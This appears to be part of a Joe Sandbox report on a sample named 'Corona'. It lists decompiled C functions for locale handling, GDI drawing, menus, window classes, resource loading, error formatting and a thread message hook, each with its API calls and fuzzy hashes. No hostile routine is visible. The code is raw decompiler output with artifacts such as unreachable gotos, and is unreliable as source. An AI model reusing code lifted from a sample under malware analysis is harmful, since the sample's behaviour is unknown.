                                  						_v780 =  *((intOrPtr*)(_v776 + 8));
                                  					} else {
                                  						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
                                  					}
                                  					_v788 =  *_v780 & 0x0000ffff;
                                  					_t79 = _v788 - 1;
                                  					if(_t79 >= 0) {
                                  						_t85 = _t79 + 1;
                                  						_t96 = 0;
                                  						_t97 =  &_v772;
                                  						do {
                                  							_v796 = _t97;
                                  							_push(_v796 + 4);
                                  							_t22 = _t96 + 1; // 0x1
                                  							_push(_v780);
                                  							L0040D5B0();
                                  							E0040E3A0(_v780);
                                  							_push( &_v784);
                                  							_t25 = _t96 + 1; // 0x1
                                  							_push(_v780);
                                  							L0040D5B8();
                                  							E0040E3A0(_v780);
                                  							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                                  							_t96 = _t96 + 1;
                                  							_t97 = _t97 + 8;
                                  							_t85 = _t85 - 1;
                                  						} while (_t85 != 0);
                                  					}
                                  					_t81 = _v788 - 1;
                                  					if(_t81 >= 0) {
                                  						_t84 = _t81 + 1;
                                  						_t60 =  &_v768;
                                  						_t92 =  &_v260;
                                  						do {
                                  							 *_t92 =  *_t60;
                                  							_t92 = _t92 + 4;
                                  							_t60 = _t60 + 8;
                                  							_t84 = _t84 - 1;
                                  						} while (_t84 != 0);
                                  						do {
                                  							goto L12;
                                  						} while (E0040E478(_t83, _t98) != 0);
                                  						goto L15;
                                  					}
                                  					L12:
                                  					_t83 = _v788 - 1;
                                  					if(E0040E448(_v788 - 1, _t98) != 0) {
                                  						_push( &_v792);
                                  						_push( &_v260);
                                  						_push(_v780);
                                  						L0040D5C0();
                                  						E0040E3A0(_v780);
                                  						E0040E6CC(_v792);
                                  					}
                                  				}
                                  				L15:
                                  				_push(_v776);
                                  				L0040D14C();
                                  				return E0040E3A0(_v776);
                                  			}


                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040E583
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040E59F
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040E616
                                  • VariantClear.OLEAUT32(?), ref: 0040E63F
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                  • String ID:
                                  • API String ID: 920484758-0
                                  • Opcode ID: 222dfd55f4586741cf6c642e18797c671bdcc356e7018be82b80e885789c82a2
                                  • Instruction ID: 9c05e375641b2ad9a7839fbb3c3f335dd74d15101c693efd1f9985299317d2ad
                                  • Opcode Fuzzy Hash: 222dfd55f4586741cf6c642e18797c671bdcc356e7018be82b80e885789c82a2
                                  • Instruction Fuzzy Hash: D14132759012199FCB65DB5ACC90BC9B3BCAF48308F4049EAE549B7352D638AF908F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040C0D4() {
                                  				char _v152;
                                  				short _v410;
                                  				signed short _t14;
                                  				signed int _t16;
                                  				int _t18;
                                  				void* _t20;
                                  				void* _t23;
                                  				int _t24;
                                  				int _t26;
                                  				signed int _t30;
                                  				signed int _t31;
                                  				signed int _t32;
                                  				signed int _t37;
                                  				int* _t39;
                                  				short* _t41;
                                  				void* _t49;
                                  
                                  				 *0x452740 = 0x409;
                                  				 *0x452744 = 9;
                                  				 *0x452748 = 1;
                                  				_t14 = GetThreadLocale();
                                  				if(_t14 != 0) {
                                  					 *0x452740 = _t14;
                                  				}
                                  				if(_t14 != 0) {
                                  					 *0x452744 = _t14 & 0x3ff;
                                  					 *0x452748 = (_t14 & 0x0000ffff) >> 0xa;
                                  				}
                                  				memcpy(0x45010c, 0x40c228, 8 << 2);
                                  				if( *0x4500c4 != 2) {
                                  					_t16 = GetSystemMetrics(0x4a);
                                  					__eflags = _t16;
                                  					 *0x45274d = _t16 & 0xffffff00 | _t16 != 0x00000000;
                                  					_t18 = GetSystemMetrics(0x2a);
                                  					__eflags = _t18;
                                  					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                                  					 *0x45274c = _t31;
                                  					__eflags = _t31;
                                  					if(__eflags != 0) {
                                  						return E0040C05C(__eflags, _t49);
                                  					}
                                  				} else {
                                  					_t20 = E0040C0BC();
                                  					if(_t20 != 0) {
                                  						 *0x45274d = 0;
                                  						 *0x45274c = 0;
                                  						return _t20;
                                  					}
                                  					E0040C05C(__eflags, _t49);
                                  					_t37 = 0x20;
                                  					_t23 = E00402C3C(0x45010c, 0x20, 0x40c228);
                                  					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                                  					 *0x45274c = _t32;
                                  					__eflags = _t32;
                                  					if(_t32 != 0) {
                                  						 *0x45274d = 0;
                                  						return _t23;
                                  					}
                                  					_t24 = 0x80;
                                  					_t39 =  &_v152;
                                  					do {
                                  						 *_t39 = _t24;
                                  						_t24 = _t24 + 1;
                                  						_t39 =  &(_t39[0]);
                                  						__eflags = _t24 - 0x100;
                                  					} while (_t24 != 0x100);
                                  					_t26 =  *0x452740; // 0x409
                                  					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                                  					_t18 = 0x80;
                                  					_t41 =  &_v410;
                                  					while(1) {
                                  						__eflags =  *_t41 - 2;
                                  						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                                  						 *0x45274d = _t37;
                                  						__eflags = _t37;
                                  						if(_t37 != 0) {
                                  							goto L17;
                                  						}
                                  						_t41 = _t41 + 2;
                                  						_t18 = _t18 - 1;
                                  						__eflags = _t18;
                                  						if(_t18 != 0) {
                                  							continue;
                                  						} else {
                                  							return _t18;
                                  						}
                                  						L18:
                                  					}
                                  				}
                                  				L17:
                                  				return _t18;
                                  				goto L18;
                                  			}


                                  APIs
                                  • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040C1C8
                                  • GetThreadLocale.KERNEL32 ref: 0040C0FE
                                    • Part of subcall function 0040C05C: GetCPInfo.KERNEL32(00000000,?), ref: 0040C075
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: InfoLocaleStringThreadType
                                  • String ID:
                                  • API String ID: 1505017576-0
                                  • Opcode ID: 996493099b2d17bd7cf62bbf6f162730e13c43baf57e3538e89db00878c7ad9d
                                  • Instruction ID: 4ccc2df17dbcb55e0bb393dd6276ecd99a585616cffa480c7b62add919e6e963
                                  • Opcode Fuzzy Hash: 996493099b2d17bd7cf62bbf6f162730e13c43baf57e3538e89db00878c7ad9d
                                  • Instruction Fuzzy Hash: E5317831540344CAE320D7A1AE813573794E757306F0442BBE984AF3E3D6BC8945CBAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00420500(intOrPtr __eax, void* __edx) {
                                  				intOrPtr _v8;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr _t33;
                                  				struct HDC__* _t47;
                                  				intOrPtr _t54;
                                  				intOrPtr _t58;
                                  				struct HDC__* _t66;
                                  				void* _t67;
                                  				intOrPtr _t76;
                                  				void* _t81;
                                  				intOrPtr _t82;
                                  				intOrPtr _t84;
                                  				intOrPtr _t86;
                                  
                                  				_t84 = _t86;
                                  				_push(_t67);
                                  				_v8 = __eax;
                                  				_t33 = _v8;
                                  				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
                                  					return _t33;
                                  				} else {
                                  					E0041D010(_v8);
                                  					_push(_t84);
                                  					_push(0x4205df);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t86;
                                  					E0042181C( *((intOrPtr*)(_v8 + 0x58)));
                                  					E0042037C( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
                                  					_t47 = E0042191C( *((intOrPtr*)(_v8 + 0x58)));
                                  					_push(0);
                                  					L0040603C();
                                  					_t66 = _t47;
                                  					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
                                  					if(_t81 == 0) {
                                  						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
                                  					} else {
                                  						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
                                  					}
                                  					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
                                  					_t82 =  *((intOrPtr*)(_t54 + 0x10));
                                  					if(_t82 == 0) {
                                  						 *((intOrPtr*)(_v8 + 0x60)) = 0;
                                  					} else {
                                  						_push(0xffffffff);
                                  						_push(_t82);
                                  						_push(_t66);
                                  						L0040619C();
                                  						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
                                  						_push(_t66);
                                  						L0040616C();
                                  					}
                                  					E0041D34C(_v8, _t66);
                                  					_t58 =  *0x4506d0; // 0x2130acc
                                  					E004139DC(_t58, _t66, _t67, _v8, _t82);
                                  					_pop(_t76);
                                  					 *[fs:eax] = _t76;
                                  					_push(0x4205e6);
                                  					return E0041D1C4(_v8);
                                  				}
                                  			}




















                                  APIs
                                    • Part of subcall function 0041D010: RtlEnterCriticalSection.KERNEL32(004528C0,00000000,0041BABE,00000000,0041BB1D), ref: 0041D018
                                    • Part of subcall function 0041D010: RtlLeaveCriticalSection.KERNEL32(004528C0,004528C0,00000000,0041BABE,00000000,0041BB1D), ref: 0041D025
                                    • Part of subcall function 0041D010: RtlEnterCriticalSection.KERNEL32(00000038,004528C0,004528C0,00000000,0041BABE,00000000,0041BB1D), ref: 0041D02E
                                    • Part of subcall function 0042191C: 72E7AC50.USER32(00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421972
                                    • Part of subcall function 0042191C: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421987
                                    • Part of subcall function 0042191C: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421991
                                    • Part of subcall function 0042191C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 004219B5
                                    • Part of subcall function 0042191C: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 004219C0
                                  • 72E7A590.GDI32(00000000,00000000,004205DF), ref: 00420555
                                  • SelectObject.GDI32(00000000,?), ref: 0042056E
                                  • 72E7B410.GDI32(00000000,?,000000FF,00000000,00000000,004205DF), ref: 00420597
                                  • 72E7B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,004205DF), ref: 004205A3
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                  • String ID:
                                  • API String ID: 2198039625-0
                                  • Opcode ID: 7daaa0602a6f3c30feca6bf3d4201867269fdbb3a71725aafeb72216e68b85c3
                                  • Instruction ID: 91acb529e453e587e84c37f74496650f681f8b4115c8d154ce90a8e5de5a1c7d
                                  • Opcode Fuzzy Hash: 7daaa0602a6f3c30feca6bf3d4201867269fdbb3a71725aafeb72216e68b85c3
                                  • Instruction Fuzzy Hash: 2A310474B04618EFD704EF69D981D4EB7F5EF48314B6241A6B804AB362D738EE80DA58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00441F64(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
                                  				intOrPtr _v8;
                                  				void* __ecx;
                                  				void* __edi;
                                  				int _t27;
                                  				void* _t40;
                                  				int _t41;
                                  				int _t50;
                                  
                                  				_t50 = _t41;
                                  				_t49 = __edx;
                                  				_t40 = __eax;
                                  				if(E00441670(__eax) == 0) {
                                  					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
                                  				}
                                  				_v8 = 0;
                                  				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
                                  					_t27 = GetMenuItemID(_t49, _t50);
                                  					_t51 = _t27;
                                  					if(_t27 != 0xffffffff) {
                                  						_v8 = E004414EC(_t40, 0, _t51);
                                  					}
                                  				} else {
                                  					_t49 = GetSubMenu(_t49, _t50);
                                  					_v8 = E004414EC(_t40, 1, _t37);
                                  				}
                                  				if(_v8 == 0) {
                                  					return 0;
                                  				} else {
                                  					 *_a12 = 0;
                                  					E0040832C(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
                                  					return E00408270(_a12, _t49);
                                  				}
                                  			}











                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Menu$ItemStateString
                                  • String ID:
                                  • API String ID: 306270399-0
                                  • Opcode ID: 7695dcd4934ca6d8f8e1a5afa3ceef8dfc79f89ac383b10caf1574907d91de8c
                                  • Instruction ID: d382304a616ae5e615044ef0aa97828d96b48f9e232a3e4caebb1d6d32162838
                                  • Opcode Fuzzy Hash: 7695dcd4934ca6d8f8e1a5afa3ceef8dfc79f89ac383b10caf1574907d91de8c
                                  • Instruction Fuzzy Hash: 7E119D31600214AFE700EB6EC981AAF77E8AB49354B10403BF805D73A2D6389C02D7A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0041A1E4(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                  				struct _WNDCLASSA _v44;
                                  				struct HINSTANCE__* _t6;
                                  				CHAR* _t8;
                                  				struct HINSTANCE__* _t9;
                                  				int _t10;
                                  				void* _t11;
                                  				struct HINSTANCE__* _t13;
                                  				struct HINSTANCE__* _t19;
                                  				CHAR* _t20;
                                  				struct HWND__* _t22;
                                  				CHAR* _t24;
                                  
                                  				_t6 =  *0x452664; // 0x400000
                                  				 *0x450400 = _t6;
                                  				_t8 =  *0x450414; // 0x41a1d4
                                  				_t9 =  *0x452664; // 0x400000
                                  				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                                  				asm("sbb eax, eax");
                                  				_t11 = _t10 + 1;
                                  				if(_t11 == 0 || L00406294 != _v44.lpfnWndProc) {
                                  					if(_t11 != 0) {
                                  						_t19 =  *0x452664; // 0x400000
                                  						_t20 =  *0x450414; // 0x41a1d4
                                  						UnregisterClassA(_t20, _t19);
                                  					}
                                  					RegisterClassA(0x4503f0);
                                  				}
                                  				_t13 =  *0x452664; // 0x400000
                                  				_t24 =  *0x450414; // 0x41a1d4
                                  				_t22 = E0040679C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
                                  				if(_a6 != 0) {
                                  					SetWindowLongA(_t22, 0xfffffffc, E0041A128(_a4, _a8));
                                  				}
                                  				return _t22;
                                  			}















                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                  • String ID:
                                  • API String ID: 4025006896-0
                                  • Opcode ID: 644a318173cb63c4816a0f8a018c1651b76b0fe091cacfb1e8be64f7603d89eb
                                  • Instruction ID: ca3d5ff2b8d88c4fb1f2204ddbc64c9ea2b6e4e8f7abaf9245ec385bd74b739d
                                  • Opcode Fuzzy Hash: 644a318173cb63c4816a0f8a018c1651b76b0fe091cacfb1e8be64f7603d89eb
                                  • Instruction Fuzzy Hash: D801A1716403046BCB10EB98DD41F9A33ACA71A309F104276F901E7392D67AE964876E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E00415C90(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                                  				CHAR* _v8;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t18;
                                  				void* _t23;
                                  				CHAR* _t24;
                                  				void* _t25;
                                  				struct HRSRC__* _t29;
                                  				void* _t30;
                                  				struct HINSTANCE__* _t31;
                                  				void* _t32;
                                  
                                  				_v8 = _t24;
                                  				_t31 = __edx;
                                  				_t23 = __eax;
                                  				_t29 = FindResourceA(__edx, _v8, _a4);
                                  				 *(_t23 + 0x10) = _t29;
                                  				_t33 = _t29;
                                  				if(_t29 == 0) {
                                  					E00415C20(_t23, _t24, _t29, _t31, _t33, _t32);
                                  					_pop(_t24);
                                  				}
                                  				_t5 = _t23 + 0x10; // 0x415d34
                                  				_t30 = LoadResource(_t31,  *_t5);
                                  				 *(_t23 + 0x14) = _t30;
                                  				_t34 = _t30;
                                  				if(_t30 == 0) {
                                  					E00415C20(_t23, _t24, _t30, _t31, _t34, _t32);
                                  				}
                                  				_t7 = _t23 + 0x10; // 0x415d34
                                  				_push(SizeofResource(_t31,  *_t7));
                                  				_t8 = _t23 + 0x14; // 0x4159f8
                                  				_t18 = LockResource( *_t8);
                                  				_pop(_t25);
                                  				return E004159B8(_t23, _t25, _t18);
                                  			}


















                                  APIs
                                  • FindResourceA.KERNEL32(?,?,?), ref: 00415CA7
                                  • LoadResource.KERNEL32(?,00415D34,?,?,?,00411B64,?,00000001,00000000,?,00415C00,?), ref: 00415CC1
                                  • SizeofResource.KERNEL32(?,00415D34,?,00415D34,?,?,?,00411B64,?,00000001,00000000,?,00415C00,?), ref: 00415CDB
                                  • LockResource.KERNEL32(004159F8,00000000,?,00415D34,?,00415D34,?,?,?,00411B64,?,00000001,00000000,?,00415C00,?), ref: 00415CE5
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID:
                                  • API String ID: 3473537107-0
                                  • Opcode ID: e728e84a2e4aa9e75c1625f6d798cac3a9beae6e292179ee188b879569e9e885
                                  • Instruction ID: 3fcd70b3ee591cac8360286a99d99138e5f5dfa3029d2547e2d6203b89e8155f
                                  • Opcode Fuzzy Hash: e728e84a2e4aa9e75c1625f6d798cac3a9beae6e292179ee188b879569e9e885
                                  • Instruction Fuzzy Hash: FCF012B2505A04AF5744EE5DA941D9B77ECDE882A4310016FF908DB246EA38DD4147BC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E0040C5C8(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				void* _t27;
                                  				intOrPtr _t29;
                                  				intOrPtr _t32;
                                  				void* _t34;
                                  				intOrPtr _t35;
                                  				void* _t42;
                                  
                                  				_push(__ebx);
                                  				_v24 = 0;
                                  				_push(_t42);
                                  				_push(0x40c658);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t42 + 0xffffffec;
                                  				_t27 = GetLastError();
                                  				if(_t27 == 0) {
                                  					_t29 =  *0x4510c4; // 0x406b54
                                  					_t34 = E0040B274(_t29, 1);
                                  				} else {
                                  					_v20 = _t27;
                                  					_v16 = 0;
                                  					E0040A9B0(_t27,  &_v24);
                                  					_v12 = _v24;
                                  					_v8 = 0xb;
                                  					_t32 =  *0x450ff0; // 0x406b4c
                                  					_t34 = E0040B2B0(_t27, _t32, 1, __edi, __esi, 1,  &_v20);
                                  				}
                                  				 *((intOrPtr*)(_t34 + 0xc)) = _t27;
                                  				E00403888();
                                  				_pop(_t35);
                                  				 *[fs:eax] = _t35;
                                  				_push(E0040C65F);
                                  				return E00403E4C( &_v24);
                                  			}















                                  APIs
                                  • GetLastError.KERNEL32(00000000,0040C658), ref: 0040C5E2
                                    • Part of subcall function 0040A9B0: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,0040C5FE,00000000,0040C658), ref: 0040A9CF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ErrorFormatLastMessage
                                  • String ID: Lk@$Pv@$Tk@
                                  • API String ID: 3479602957-789690419
                                  • Opcode ID: 1dcf680e292bec6dcab1320b32f56496fda8a020085ab9f1d00a048cbd8f660a
                                  • Instruction ID: d14df5bd11e1f77bc0cbc960a28454eb9ae87559aa3fab790ac53288b952cf49
                                  • Opcode Fuzzy Hash: 1dcf680e292bec6dcab1320b32f56496fda8a020085ab9f1d00a048cbd8f660a
                                  • Instruction Fuzzy Hash: C711E530A042459FC710DF65C881AAFB7E8E748304F60497AE400F33C1DB39AE00CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E0042C558(struct HWND__* __eax, void* __ecx) {
                                  				intOrPtr _t9;
                                  				signed int _t16;
                                  				struct HWND__* _t19;
                                  				DWORD* _t20;
                                  
                                  				_t17 = __ecx;
                                  				_push(__ecx);
                                  				_t19 = __eax;
                                  				_t16 = 0;
                                  				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
                                  					_t9 =  *0x452b20; // 0x2131290
                                  					if(GlobalFindAtomA(E0040430C(_t9)) !=  *0x452b1c) {
                                  						_t16 = 0 | E0042B6A0(_t19, _t17) != 0x00000000;
                                  					} else {
                                  						_t16 = 0 | GetPropA(_t19,  *0x452b1c & 0x0000ffff) != 0x00000000;
                                  					}
                                  				}
                                  				return _t16;
                                  			}








                                  APIs
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0042C565
                                  • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,0042C5D0,0042C392,00452B54,00000000,0042C182,?,-0000000C,?), ref: 0042C56E
                                  • GlobalFindAtomA.KERNEL32 ref: 0042C583
                                  • GetPropA.USER32 ref: 0042C59A
                                  Similarity
                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                  • String ID:
                                  • API String ID: 2582817389-0
                                  • Opcode ID: faddc84341df4fdd579243a5d8c046d256093bc84b24df8ed12a0284e8f2d008
                                  • Instruction ID: 5c067255dbf241b70837bed8c971c1eae5d06f0a16844abbfa2f4e3a0fafa03d
                                  • Opcode Fuzzy Hash: faddc84341df4fdd579243a5d8c046d256093bc84b24df8ed12a0284e8f2d008
                                  • Instruction Fuzzy Hash: 12F0A772302632A796117B766DC197F279CDD01314780403BFC41E229AD72CDCC181BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E0042B6D4(struct HWND__* __eax, void* __ecx) {
                                  				intOrPtr _t5;
                                  				struct HWND__* _t12;
                                  				void* _t15;
                                  				DWORD* _t16;
                                  
                                  				_t13 = __ecx;
                                  				_push(__ecx);
                                  				_t12 = __eax;
                                  				_t15 = 0;
                                  				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
                                  					_t5 =  *0x452b24; // 0x21312ac
                                  					if(GlobalFindAtomA(E0040430C(_t5)) !=  *0x452b1e) {
                                  						_t15 = E0042B6A0(_t12, _t13);
                                  					} else {
                                  						_t15 = GetPropA(_t12,  *0x452b1e & 0x0000ffff);
                                  					}
                                  				}
                                  				return _t15;
                                  			}








                                  APIs
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0042B6E1
                                  • GetCurrentProcessId.KERNEL32(?,?,00000000,0044D953,?,?,0044F588,00000001,0044DABF,?,?,?,0044F588), ref: 0042B6EA
                                  • GlobalFindAtomA.KERNEL32 ref: 0042B6FF
                                  • GetPropA.USER32 ref: 0042B716
                                  Similarity
                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                  • String ID:
                                  • API String ID: 2582817389-0
                                  • Opcode ID: cc6839f6c5a09ec5e791e88545f55499ca0ab2370e03b8fc47d7092cafeebdd4
                                  • Instruction ID: 6c06f67494b33a3d1deaf9400f4288f92fc59f4f0e186d877fd2beb469429859
                                  • Opcode Fuzzy Hash: cc6839f6c5a09ec5e791e88545f55499ca0ab2370e03b8fc47d7092cafeebdd4
                                  • Instruction Fuzzy Hash: 9DF01CA270022166DA207BB6BD8183B27DCCAC5396791153BB941F7247DA2EDC0082FD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044C540(void* __ecx) {
                                  				void* _t2;
                                  				DWORD* _t7;
                                  
                                  				_t2 =  *0x452bb0; // 0x2131714
                                  				if( *((char*)(_t2 + 0xa5)) == 0) {
                                  					if( *0x452bc8 == 0) {
                                  						_t2 = SetWindowsHookExA(3, E0044C4FC, 0, GetCurrentThreadId());
                                  						 *0x452bc8 = _t2;
                                  					}
                                  					if( *0x452bc4 == 0) {
                                  						_t2 = CreateEventA(0, 0, 0, 0);
                                  						 *0x452bc4 = _t2;
                                  					}
                                  					if( *0x452bcc == 0) {
                                  						_t2 = CreateThread(0, 0x3e8, E0044C4A0, 0, 0, _t7);
                                  						 *0x452bcc = _t2;
                                  					}
                                  				}
                                  				return _t2;
                                  			}






                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 0044C558
                                  • SetWindowsHookExA.USER32 ref: 0044C568
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0044C583
                                  • CreateThread.KERNEL32(00000000,000003E8,0044C4A0,00000000,00000000), ref: 0044C5A7
                                  Similarity
                                  • API ID: CreateThread$CurrentEventHookWindows
                                  • String ID:
                                  • API String ID: 1195359707-0
                                  • Opcode ID: 871f6713dc012d185ff1d29e8f03871ec8a0b881da905f28df5364b8d4670c79
                                  • Instruction ID: 8649e50f895fd3de98720aa6103de071f441375a67cc656879163edb7f1096b5
                                  • Opcode Fuzzy Hash: 871f6713dc012d185ff1d29e8f03871ec8a0b881da905f28df5364b8d4670c79
